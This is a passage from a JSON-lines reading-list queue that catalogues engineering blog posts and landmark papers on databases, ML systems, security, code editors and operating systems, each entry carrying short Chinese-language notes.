收集人物资料;红队/调研工具。"},"url":"https://github.com/soxoj/maigret","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"domain-expertise-real-moat","area":"projects","topic":"engineering-culture","title":"Domain expertise has always been the real moat","meta":{"col3":"2026","col4":"HN best 30d 539 pts;后 LLM 时代护城河讨论;适合 daily reflection。"},"url":"https://www.brethorsting.com/blog/2026/05/domain-expertise-has-always-been-the-real-moat/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"zig-build-system-reworked","area":"projects","topic":"compilers-pl","title":"Zig: Build System Reworked (devlog 2026-05-26)","meta":{"col3":"2026","col4":"HN best 30d 350 pts;Zig 0.x build graph 重写;学习现代 build system 设计。"},"url":"https://ziglang.org/devlog/2026/#2026-05-26","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"rendering-diffs-pierre","area":"projects","topic":"dataviz","title":"On Rendering Diffs (Pierre)","meta":{"col3":"2026","col4":"HN best 30d 204 pts;diff 渲染算法 + UX;适合 frontend/devtool 学习。"},"url":"https://pierre.computer/writing/on-rendering-diffs","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"liquid-ai-lfm2-moe","area":"projects","topic":"machine-learning","title":"Liquid AI LFM2-5: 8B-A1B MoE trained on 38T tokens","meta":{"col3":"2026","col4":"HN best 30d 241 pts;新一代 MoE 开源模型;架构 + 训练数据规模。"},"url":"https://www.liquid.ai/blog/lfm2-5-8b-a1b","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"frontend-lost-decade-ai","area":"projects","topic":"engineering-culture","title":"Is AI causing a repeat of frontend's lost decade?","meta":{"col3":"2026","col4":"HN 30d 399 pts;mastrojs 反思 AI 时代 frontend 复杂度回潮。"},"url":"https://mastrojs.github.io/blog/2026-05-23-is-AI-causing-a-repeat-of-frontends-lost-decade/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"compile-quake-1997","area":"projects","topic":"compilers-pl","title":"Let's compile Quake like it's 1997 (Fabien Sanglard)","meta":{"col3":"2026","col4":"HN 30d 219 pts;DOS toolchain 重现 Quake 编译;优秀经典 build/PL 教学。"},"url":"https://fabiensanglard.net/compile_like_1997/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"various-llm-smells","area":"projects","topic":"machine-learning","title":"Various LLM Smells","meta":{"col3":"2026","col4":"HN 30d 364 pts;LLM 代码生成异味目录;类比 code smells。"},"url":"https://shvbsle.in/various-llm-smells/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"lakehouse-2021","area":"papers","topic":"databases","title":"Lakehouse: A New Generation of Open Platforms that Unify Data Warehousing and Advanced Analytics","meta":{"col3":"2021","col4":"CMU 15-721 syllabus;Databricks/Zaharia;现代 data platform 架构定义性论文。"},"url":"https://www.cidrdb.org/cidr2021/papers/cidr2021_paper17.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"columnar-storage-formats-2023","area":"papers","topic":"databases","title":"An Empirical Evaluation of Columnar Storage Formats","meta":{"col3":"2023","col4":"CMU 15-721;Parquet/ORC/Arrow 实证对比;理解列存格式权衡的必读。"},"url":"https://www.vldb.org/pvldb/vol17/p148-zeng.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"fastlanes-compression","area":"papers","topic":"databases","title":"The FastLanes Compression Layout: Decoding >100B Integers per Second with Scalar Code","meta":{"col3":"2023","col4":"CMU 15-721;CWI;列存压缩 SIMD-friendly 布局;DuckDB 采用基础。"},"url":"https://www.vldb.org/pvldb/vol16/p2132-afroozeh.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"velox-meta-2022","area":"papers","topic":"databases","title":"Velox: Meta's Unified Execution Engine","meta":{"col3":"2022","col4":"VLDB'22;Meta 统一 Presto/Spark/Pandas 执行后端;现代 vectorized engine 工业化案例。"},"url":"https://www.vldb.org/pvldb/vol15/p3372-pedreira.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"morsel-driven-2014","area":"papers","topic":"databases","title":"Morsel-Driven Parallelism: A NUMA-Aware Query Evaluation Framework","meta":{"col3":"2014","col4":"SIGMOD'14;HyPer/Umbra 调度核心;many-core 时代 query parallelism 标准范式。"},"url":"https://db.in.tum.de/~leis/papers/morsels.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"efficient-compile-2011","area":"papers","topic":"databases","title":"Efficiently Compiling Efficient Query Plans for Modern Hardware","meta":{"col3":"2011","col4":"VLDB'11;Neumann;data-centric query compilation;HyPer/Umbra 路线起点。"},"url":"https://www.vldb.org/pvldb/vol4/p539-neumann.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"wco-joins-relational-2020","area":"papers","topic":"databases","title":"Adopting Worst-Case Optimal Joins in Relational Database Systems","meta":{"col3":"2020","col4":"CMU 15-721;WCOJ 进入 RDBMS;图模式查询性能突破基础。"},"url":"https://www.vldb.org/pvldb/vol13/p1891-freitag.pdf","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"dremel-decade-2020","area":"papers","topic":"databases","title":"Dremel: A Decade of Interactive SQL Analysis at Web Scale","meta":{"col3":"2020","col4":"VLDB'20;Google 回顾 Dremel 十年演进;BigQuery 设计依据。"},"url":"https://research.google/pubs/dremel-a-decade-of-interactive-sql-analysis-at-web-scale/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"farm-2015","area":"papers","topic":"distributed-systems","title":"FaRM: Fast Remote Memory","meta":{"col3":"2014","col4":"NSDI'14;MSR;RDMA + 1-sided reads;现代低延迟存储系统起点。"},"url":"https://www.microsoft.com/en-us/research/publication/farm-fast-remote-memory/","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"ray-2018","area":"papers","topic":"distributed-systems","title":"Ray: A Distributed Framework for Emerging AI Applications","meta":{"col3":"2018","col4":"OSDI'18;Berkeley;actor + task model 统一;现代 LLM training/inference 编排底座。"},"url":"https://www.usenix.org/conference/osdi18/presentation/moritz","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"on-demand-container-loading","area":"papers","topic":"distributed-systems","title":"On-demand Container Loading in AWS Lambda","meta":{"col3":"2023","col4":"USENIX ATC'23;Lambda 启动 GB-级镜像 sub-second;现代 serverless 冷启动工程。"},"url":"https://www.usenix.org/conference/atc23/presentation/brooker","status":"new","claimed_by":null,"attempts":0,"source_file":"long-batch-30-R157-2026-05-31"} -{"slug":"paged-attention-vllm","area":"papers","topic":"ml-systems","title":"Efficient Memory Management for Large Language Model Serving with PagedAttention","meta":{"col3":"2023","col4":"Kwon et al. SOSP'23;vLLM 核心机制:把 GPU 显存当 OS 页表管 KV cache,直接催生 vLLM/SGLang/TensorRT-LLM 整代推理引擎"},"url":"https://arxiv.org/abs/2309.06180","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"flashattention-2","area":"papers","topic":"ml-systems","title":"FlashAttention-2: Faster Attention with Better Parallelism","meta":{"col3":"2023","col4":"Tri Dao;用 work partitioning 重排把 IO-aware attention 推到 A100 接近峰值,已是所有现代训练/推理 stack 的默认实现"},"url":"https://arxiv.org/abs/2307.08691","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"flashattention-3-2024","area":"papers","topic":"ml-systems","title":"FlashAttention-3: Fast and Accurate Attention with Asynchrony and Low-Precision","meta":{"col3":"2024","col4":"Hopper 上利用 WGMMA + FP8 + warp specialization;H100 attention 实测达峰值 75%;TMA 异步流水范本"},"url":"https://arxiv.org/abs/2407.08608","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"megatron-core-moe-2026","area":"papers","topic":"ml-systems","title":"Scalable Training of Mixture-of-Experts Models with Megatron Core","meta":{"col3":"2026","col4":"NVIDIA 系统综述:MoE 训练全栈优化(recompute/offload/Grouped GEMM/CUDA Graphs/FP8);DeepSeek-V3-685B 1233 TFLOPS"},"url":"https://arxiv.org/abs/2603.07685","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"vescale-fsdp-2026","area":"papers","topic":"ml-systems","title":"veScale-FSDP: Flexible and High-Performance FSDP at Scale","meta":{"col3":"2026","col4":"字节自研 FSDP;RaggedShard 结构感知分片支持 block-quant/Shampoo/Muon;万卡级 5–66% 吞吐提升"},"url":"https://arxiv.org/abs/2602.22437","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"qserve-w4a8kv4-2024","area":"papers","topic":"ml-systems","title":"QServe: W4A8KV4 Quantization and System Co-design for Efficient LLM Serving","meta":{"col3":"2024","col4":"Song Han;揭穿 INT4 在云端 batch 上的 dequant overhead,提出渐进量化 + SmoothAttention,实测 Llama-3 1.4x"},"url":"https://arxiv.org/abs/2405.04532","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"expertflow-moe-offload","area":"papers","topic":"ml-systems","title":"ExpertFlow: Efficient MoE Inference via Predictive Expert Caching","meta":{"col3":"2024","col4":"解决 MoE 部署内存爆炸:路由预测 + token 调度 + 预测式 expert cache;93.7% 显存削减 10x throughput"},"url":"https://arxiv.org/abs/2410.17954","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"nexus-prefill-decode-intra-gpu","area":"papers","topic":"ml-systems","title":"Nexus: Proactive Intra-GPU Disaggregation of Prefill and Decode","meta":{"col3":"2025","col4":"在单 GPU 内动态切 prefill/decode 资源;vLLM 上 2.2x 吞吐 / 20x TTFT;引入饱和与带宽争用模型"},"url":"https://arxiv.org/abs/2507.06608","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"liger-kernel-llm-training","area":"papers","topic":"ml-systems","title":"Liger Kernel: Efficient Triton Kernels for LLM Training","meta":{"col3":"2024","col4":"LinkedIn 开源 Triton kernel 套件;fused chunked CE/RMSNorm 等带来 20% 训练吞吐 + 60% 显存节省"},"url":"https://arxiv.org/abs/2410.10989","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"triton-anatomy-paged-attn","area":"papers","topic":"ml-systems","title":"The Anatomy of a Triton Attention Kernel","meta":{"col3":"2025","col4":"把 paged attention 用纯 Triton 写到 NVIDIA/AMD 上 SOTA 105.9%;可移植 LLM 推理 kernel 编写范本"},"url":"https://arxiv.org/abs/2511.11581","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"speculative-decoding-leviathan-2023","area":"papers","topic":"ml-systems","title":"Fast Inference from Transformers via Speculative Decoding","meta":{"col3":"2023","col4":"Leviathan-Kalman;speculative decoding 起源论文,draft+verify 推理范式被 vLLM/TGI/EAGLE 等普遍继承"},"url":"https://arxiv.org/abs/2211.17192","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"tensorrt-llm-overview","area":"papers","topic":"ml-systems","title":"NVIDIA TensorRT-LLM: An Open-Source Library for Optimizing LLM Inference","meta":{"col3":"2024","col4":"NVIDIA 官方推理库技术报告;CUDA Graph + 多种 attention impl + chunked prefill + in-flight batching"},"url":"https://github.com/NVIDIA/TensorRT-LLM","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"sglang-radixattention","area":"papers","topic":"ml-systems","title":"SGLang: Efficient Execution of Structured Language Model Programs","meta":{"col3":"2024","col4":"Lianmin Zheng;RadixAttention 自动复用 KV prefix;编程模型 + 运行时一体化,对 agent/tool-use workload 关键"},"url":"https://arxiv.org/abs/2312.07104","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"ds-zero-pp-comm","area":"papers","topic":"ml-systems","title":"ZeRO++: Extremely Efficient Collective Communication for Giant Model Training","meta":{"col3":"2024","col4":"DeepSpeed ZeRO++ 系列:低精度通信 + hierarchical partitioning,把跨机带宽瓶颈削 4x;多机训练标配"},"url":"https://arxiv.org/abs/2306.10209","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"rsa-1978","area":"papers","topic":"security-privacy","title":"A Method for Obtaining Digital Signatures and Public-Key Cryptosystems","meta":{"col3":"1978","col4":"Rivest-Shamir-Adleman;非对称密码学的开山论文,所有 PKI/TLS/PGP 的祖宗"},"url":"https://people.csail.mit.edu/rivest/Rsapaper.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"noise-protocol-framework","area":"papers","topic":"security-privacy","title":"The Noise Protocol Framework","meta":{"col3":"2018","col4":"Trevor Perrin;为 WireGuard/WhatsApp/Signal X3DH 提供通用 handshake pattern 形式化框架"},"url":"https://noiseprotocol.org/noise.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"signal-double-ratchet-2016","area":"papers","topic":"security-privacy","title":"The Double Ratchet Algorithm","meta":{"col3":"2016","col4":"Signal/WhatsApp/Matrix 端到端加密的核心;前向安全 + post-compromise security 同时实现"},"url":"https://signal.org/docs/specifications/doubleratchet/doubleratchet.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"ckks-homomorphic-2017","area":"papers","topic":"security-privacy","title":"Homomorphic Encryption for Arithmetic of Approximate Numbers","meta":{"col3":"2017","col4":"Cheon-Kim-Kim-Song;CKKS 全同态方案,浮点近似域;TenSeal/HEAAN/SEAL 后端基础"},"url":"https://eprint.iacr.org/2016/421.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"dwork-differential-privacy-2006","area":"papers","topic":"security-privacy","title":"Calibrating Noise to Sensitivity in Private Data Analysis","meta":{"col3":"2006","col4":"Dwork-McSherry-Nissim-Smith;正式定义 ε-DP + Laplace mechanism;现代隐私 ML 范式起点"},"url":"https://link.springer.com/chapter/10.1007/11681878_14","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"zk-snark-pinocchio-2013","area":"papers","topic":"security-privacy","title":"Pinocchio: Nearly Practical Verifiable Computation","meta":{"col3":"2013","col4":"Parno et al.;首批工程化 zk-SNARK;Zcash/Filecoin/StarkWare 都站在它肩上"},"url":"https://eprint.iacr.org/2013/279","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"spectre-attack-2018","area":"papers","topic":"security-privacy","title":"Spectre Attacks: Exploiting Speculative Execution","meta":{"col3":"2018","col4":"Kocher et al.;揭示推测执行造成的边信道,触发整个 CPU 行业 redesign(IBPB/STIBP/retpoline)"},"url":"https://spectreattack.com/spectre.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"meltdown-attack-2018","area":"papers","topic":"security-privacy","title":"Meltdown: Reading Kernel Memory from User Space","meta":{"col3":"2018","col4":"Lipp et al.;Intel 乱序执行漏洞,KPTI 进入 Linux/Windows/macOS 的直接动因"},"url":"https://meltdownattack.com/meltdown.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"rowhammer-2014","area":"papers","topic":"security-privacy","title":"Flipping Bits in Memory Without Accessing Them","meta":{"col3":"2014","col4":"Kim et al.;DRAM 物理副作用导致的位翻转,开启硬件层安全研究分支;ECC 不能完全防"},"url":"https://users.ece.cmu.edu/~yoonguk/papers/kim-isca14.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"oauth2-rfc6749","area":"papers","topic":"security-privacy","title":"OAuth 2.0 Authorization Framework (RFC 6749)","meta":{"col3":"2012","col4":"现代 web 授权事实标准;Google/GitHub/Slack/Atlassian/Apple Sign-In 都基于此"},"url":"https://datatracker.ietf.org/doc/html/rfc6749","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"webauthn-fido2","area":"papers","topic":"security-privacy","title":"Web Authentication: An API for accessing Public Key Credentials Level 2","meta":{"col3":"2021","col4":"W3C/FIDO2;passkey 的协议层;用挑战-响应 + 设备绑定密钥淘汰密码"},"url":"https://www.w3.org/TR/webauthn-2/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"log4shell-cve-2021-44228","area":"papers","topic":"security-privacy","title":"Log4Shell (CVE-2021-44228) Analysis","meta":{"col3":"2021","col4":"log4j JNDI 注入;JVM 生态最严重 RCE 之一;推动 SBOM/sigstore/SCA 普及"},"url":"https://logging.apache.org/log4j/2.x/security.html","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"sigstore-cosign-2022","area":"papers","topic":"security-privacy","title":"Sigstore: Software Signing for Everybody","meta":{"col3":"2022","col4":"Newman et al.;keyless signing + Rekor 透明日志;Linux Foundation 软件供应链方案"},"url":"https://www.usenix.org/conference/usenixsecurity22/presentation/newman","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"tls-1-3-rfc8446","area":"papers","topic":"security-privacy","title":"TLS 1.3 (RFC 8446)","meta":{"col3":"2018","col4":"0-RTT 握手 + 现代 AEAD 套件;mandates forward secrecy;现代 web 的握手层基线"},"url":"https://datatracker.ietf.org/doc/html/rfc8446","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"tree-sitter-2018","area":"papers","topic":"editors-ide","title":"Tree-sitter: An Incremental Parsing System","meta":{"col3":"2018","col4":"Max Brunsfeld;GLR 增量解析器生成器;Atom/Neovim/GitHub 高亮 + 代码导航的事实标准"},"url":"https://tree-sitter.github.io/tree-sitter/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"language-server-protocol-spec","area":"papers","topic":"editors-ide","title":"Language Server Protocol Specification","meta":{"col3":"2016","col4":"Microsoft;M*N → M+N 的编辑器/语言解耦协议;rust-analyzer/clangd/pyright 等都基于此"},"url":"https://microsoft.github.io/language-server-protocol/specifications/lsp/3.17/specification/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"debug-adapter-protocol","area":"papers","topic":"editors-ide","title":"Debug Adapter Protocol","meta":{"col3":"2017","col4":"Microsoft;DAP 把 debugger 与 IDE 解耦;VS Code/Vim/Emacs 都重用 DAP 客户端"},"url":"https://microsoft.github.io/debug-adapter-protocol/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"salsa-incremental-rust-analyzer","area":"papers","topic":"editors-ide","title":"Salsa: A Generic Framework for On-Demand, Incrementalized Computation","meta":{"col3":"2019","col4":"Niko Matsakis;rust-analyzer / rustc query system 引擎;增量编译/IDE 响应式核心"},"url":"https://github.com/salsa-rs/salsa","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"codemirror-6-architecture","area":"papers","topic":"editors-ide","title":"CodeMirror 6 Architecture","meta":{"col3":"2021","col4":"Marijn Haverbeke;不变式 state + functional view + tree-sitter 集成;现代 web editor 标杆"},"url":"https://codemirror.net/docs/guide/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"monaco-editor-2016","area":"papers","topic":"editors-ide","title":"Monaco Editor: VS Code's Editor as a Library","meta":{"col3":"2016","col4":"Microsoft;VS Code 同源编辑器内核;TextMate grammars + LSP 客户端 + 基于行的渲染"},"url":"https://microsoft.github.io/monaco-editor/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"zed-editor-collaborative","area":"papers","topic":"editors-ide","title":"Zed: A High-Performance Multiplayer Code Editor in Rust","meta":{"col3":"2024","col4":"Atom 团队;GPUI + CRDT + tree-sitter;端到端 Rust + 协同编辑实践范本"},"url":"https://zed.dev/blog/zed-decoded-architecture","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"eg-walker-collab-text-2024","area":"papers","topic":"editors-ide","title":"Collaborative Text Editing with Eg-walker: Better, Faster, Smaller","meta":{"col3":"2024","col4":"Kleppmann;OT 与 CRDT 之间的折中;显著降低协同编辑内存与加载时间"},"url":"https://arxiv.org/abs/2409.14252","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"yjs-crdt-overview","area":"papers","topic":"editors-ide","title":"Yjs: Shared Editing with CRDTs","meta":{"col3":"2020","col4":"Kevin Jahns;现代 web 协同编辑事实库;ProseMirror/CodeMirror/TipTap/BlockNote 后端"},"url":"https://docs.yjs.dev/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"automerge-json-crdt-2017","area":"papers","topic":"editors-ide","title":"A Conflict-Free Replicated JSON Datatype","meta":{"col3":"2017","col4":"Kleppmann-Beresford;JSON CRDT 形式化;Automerge 1/2 演化的源"},"url":"https://arxiv.org/abs/1608.03960","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"operational-transform-jupiter-1995","area":"papers","topic":"editors-ide","title":"High-Latency, Low-Bandwidth Windowing in the Jupiter Collaboration System","meta":{"col3":"1995","col4":"Nichols et al.;Google Docs / Etherpad 使用的 OT 算法源头"},"url":"https://dl.acm.org/doi/10.1145/215585.215706","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"prosemirror-architecture","area":"papers","topic":"editors-ide","title":"ProseMirror: A Toolkit for Building Rich-Text Editors","meta":{"col3":"2017","col4":"Marijn Haverbeke;schema-driven 富文本,Notion/Atlassian/Confluence 编辑器后端"},"url":"https://prosemirror.net/docs/guide/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"rust-analyzer-architecture","area":"papers","topic":"editors-ide","title":"Rust Analyzer: Architecture","meta":{"col3":"2019","col4":"Aleksey Kladov;增量分析 + lazy evaluation + on-demand compiler;现代 IDE 引擎设计教科书"},"url":"https://github.com/rust-lang/rust-analyzer/blob/master/docs/dev/architecture.md","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"kakoune-vim-philosophy","area":"papers","topic":"editors-ide","title":"Kakoune: An Object-Oriented Modal Editor","meta":{"col3":"2020","col4":"把 Vim 的 verb-noun 颠倒成 noun-verb;多光标 first-class;Helix 直接继承其设计"},"url":"https://kakoune.org/why-kakoune/why-kakoune.html","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"mach-rashid-1986","area":"papers","topic":"operating-systems","title":"Mach: A New Kernel Foundation for UNIX Development","meta":{"col3":"1986","col4":"Rashid et al.;微内核与 IPC 范式;macOS/iOS XNU 的 Mach 部分直接继承"},"url":"https://www.cs.cmu.edu/afs/cs/project/mach/public/www/doc/publications/usenix86.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"l4-microkernel-1995","area":"papers","topic":"operating-systems","title":"On Micro-Kernel Construction (L4)","meta":{"col3":"1995","col4":"Liedtke;秒级 IPC 性能 + 极简内核;seL4/Genode/Fiasco 谱系起点"},"url":"https://os.itec.kit.edu/downloads/sosp95-mkernel-construction.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"sel4-formal-2009","area":"papers","topic":"operating-systems","title":"seL4: Formal Verification of an OS Kernel","meta":{"col3":"2009","col4":"Klein et al. SOSP'09;首个端到端形式化验证内核;安全/航空/防御领域基线"},"url":"https://sel4.systems/Info/Docs/seL4-paper-CACM.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"singularity-os-2007","area":"papers","topic":"operating-systems","title":"Singularity: Rethinking the Software Stack","meta":{"col3":"2007","col4":"Hunt-Larus;软件隔离进程 + 类型化 IPC;Rust-style safety 在 OS 层的早期探索"},"url":"https://www.microsoft.com/en-us/research/wp-content/uploads/2007/04/osr2007_rethinkingsoftwarestack.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"mirage-unikernel-2013","area":"papers","topic":"operating-systems","title":"Unikernels: Library Operating Systems for the Cloud","meta":{"col3":"2013","col4":"Madhavapeddy et al. ASPLOS'13;OCaml 编出 unikernel;冷启动 < 50ms 的 cloud OS 范本"},"url":"https://anil.recoil.org/papers/2013-asplos-mirage.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"firecracker-microvm-2020","area":"papers","topic":"operating-systems","title":"Firecracker: Lightweight Virtualization for Serverless Applications","meta":{"col3":"2020","col4":"Agache et al. NSDI'20;AWS Lambda/Fargate 的 microVM;KVM + jailer,125ms 启动 + 5MiB 内存"},"url":"https://www.usenix.org/system/files/nsdi20-paper-agache.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"io-uring-axboe-2019","area":"papers","topic":"operating-systems","title":"Efficient IO with io_uring","meta":{"col3":"2019","col4":"Jens Axboe;Linux 5.1+;共享环 + SQE/CQE,绕开 syscall 进出,DB/网络栈下一代 IO"},"url":"https://kernel.dk/io_uring.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"ebpf-linux-runtime-2024","area":"papers","topic":"operating-systems","title":"The eBPF Runtime in the Linux Kernel","meta":{"col3":"2024","col4":"Gbadamosi et al.;首篇系统化 eBPF 运行时论文;observability/network/security/scheduler 全面覆盖"},"url":"https://arxiv.org/abs/2410.00026","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"zfs-bonwick-2003","area":"papers","topic":"operating-systems","title":"The Zettabyte File System (ZFS)","meta":{"col3":"2003","col4":"Bonwick;CoW + transactional + 校验和 + snapshot;现代 filesystem 范式(Btrfs/APFS 都受影响)"},"url":"https://www.cs.hmc.edu/~rhodes/courses/cs134/papers/zfs.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"rcu-mckenney-2017","area":"papers","topic":"operating-systems","title":"What is RCU, Fundamentally?","meta":{"col3":"2017","col4":"Paul McKenney;Linux 内核读端无锁同步范式;调度器/路由表/虚存子系统都用"},"url":"https://lwn.net/Articles/262464/","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"jemalloc-evans-2006","area":"papers","topic":"operating-systems","title":"A Scalable Concurrent malloc(3) Implementation for FreeBSD","meta":{"col3":"2006","col4":"Jason Evans;jemalloc;多 arena + 线程缓存 + size class;FreeBSD/Firefox/Redis 默认"},"url":"https://people.freebsd.org/~jasone/jemalloc/bsdcan2006/jemalloc.pdf","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} -{"slug":"tcmalloc-google-2007","area":"papers","topic":"operating-systems","title":"TCMalloc: Thread-Caching Malloc","meta":{"col3":"2007","col4":"Google;per-thread cache + central freelist + page heap;Chromium/Bazel/绝大多数 Google 服务默认"},"url":"https://google.github.io/tcmalloc/design.html","status":"candidate","claimed_by":null,"attempts":0,"source_file":"topic-targeted-2026-05-31","priority_tier":"topic-balance"} 